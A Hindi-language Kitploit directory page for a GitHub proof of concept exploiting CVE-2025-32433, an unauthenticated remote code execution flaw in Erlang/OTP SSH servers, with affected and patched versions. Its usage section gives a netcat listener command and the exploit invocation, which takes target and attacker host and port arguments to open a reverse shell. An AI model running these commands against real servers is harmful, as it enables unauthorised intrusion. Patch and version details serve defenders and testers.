Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-32433-Erlang-OTP-SSH-Unauthenticated-RCE — PoC जो Erlang/OTP SSH सर्वर में बिना प्रमाणीकरण के रिमोट कोड निष्पादन (unauthenticated remote code execution) को दर्शाता है। SSH प्रोटोकॉल संदेश प्रबंधन में एक दोष का फायदा उठाकर, एक हमलावर वैध क्रेडेंशियल्स के बिना लक्ष्य पर मनमाने कमांड निष्पादित कर सकता है। | Kitploit
उपकरण/GitHubGitHub/dollarboysushil/cve-2025-32433-erlang-otp-ssh-unauthenticated-rce
पेलोड जनरेशनभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारिमोट एक्सेस टूल
GitHubdollarboysushil/cve-2025-32433-erlang-otp-ssh-unauthenticated-rce

CVE-2025-32433-Erlang-OTP-SSH-Unauthenticated-RCE

PoC जो Erlang/OTP SSH सर्वर में बिना प्रमाणीकरण के रिमोट कोड निष्पादन (unauthenticated remote code execution) को दर्शाता है। SSH प्रोटोकॉल संदेश प्रबंधन में एक दोष का फायदा उठाकर, एक हमलावर वैध क्रेडेंशियल्स के बिना लक्ष्य पर मनमाने कमांड निष्पादित कर सकता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
311 महीने पहलेअभी तक समीक्षित नहीं

CVE-2025-32433 - Erlang/OTP SSH RCE PoC

CVE-2025-32433

अवलोकन

PoC जो Erlang/OTP SSH सर्वर में बिना प्रमाणीकरण के रिमोट कोड निष्पादन दर्शाता है।
SSH प्रोटोकॉल संदेश प्रबंधन में एक दोष का फायदा उठाकर, हमलावर बिना वैध क्रेडेंशियल्स के लक्ष्य पर मनमानी कमांड निष्पादित कर सकता है।

  • CVE: CVE-2025-32433
  • CVSS Score: 10.0 (गंभीर)
  • प्रभावित संस्करण:
    • OTP-27.3.3 और पहले के संस्करण
    • OTP-26.2.5.11 और पहले के संस्करण
    • OTP-25.3.2.20 और पहले के संस्करण

यह समस्या OTP-27.3.3, OTP-26.2.5.11, और OTP-25.3.2.20 में पैच की गई है।

संदर्भ

  • Unit42 Advisory
  • PoC Repository
  • NVD Entry

उपयोग

लिसनर सेटअप:

root@kitploit:~
nc -lvnp 1234

alt text एक्सप्लॉइट चलाएँ:

root@kitploit:~
python3 CVE-2025-32433-dbs --rhost <TARGET_IP> --rport <TARGET_PORT> --lhost <ATTACKER_IP> --lport <ATTACKER_PORT>
  • --rhost : लक्ष्य IP
  • --rport : लक्ष्य SSH पोर्ट
  • --lhost : रिवर्स शेल के लिए आपका IP
  • --lport : आपका लिसनर पोर्ट

alt text

alt text

अस्वीकरण

यह रिपॉजिटरी केवल शैक्षिक उद्देश्यों के लिए है। इस एक्सप्लॉइट का उपयोग उन सिस्टमों पर न करें जिनके आप स्वामी नहीं हैं या जिनके परीक्षण की आपके पास स्पष्ट अनुमति नहीं है। दुरुपयोग अवैध हो सकता है और सख्त वर्जित है।

टूल डाउनलोड करें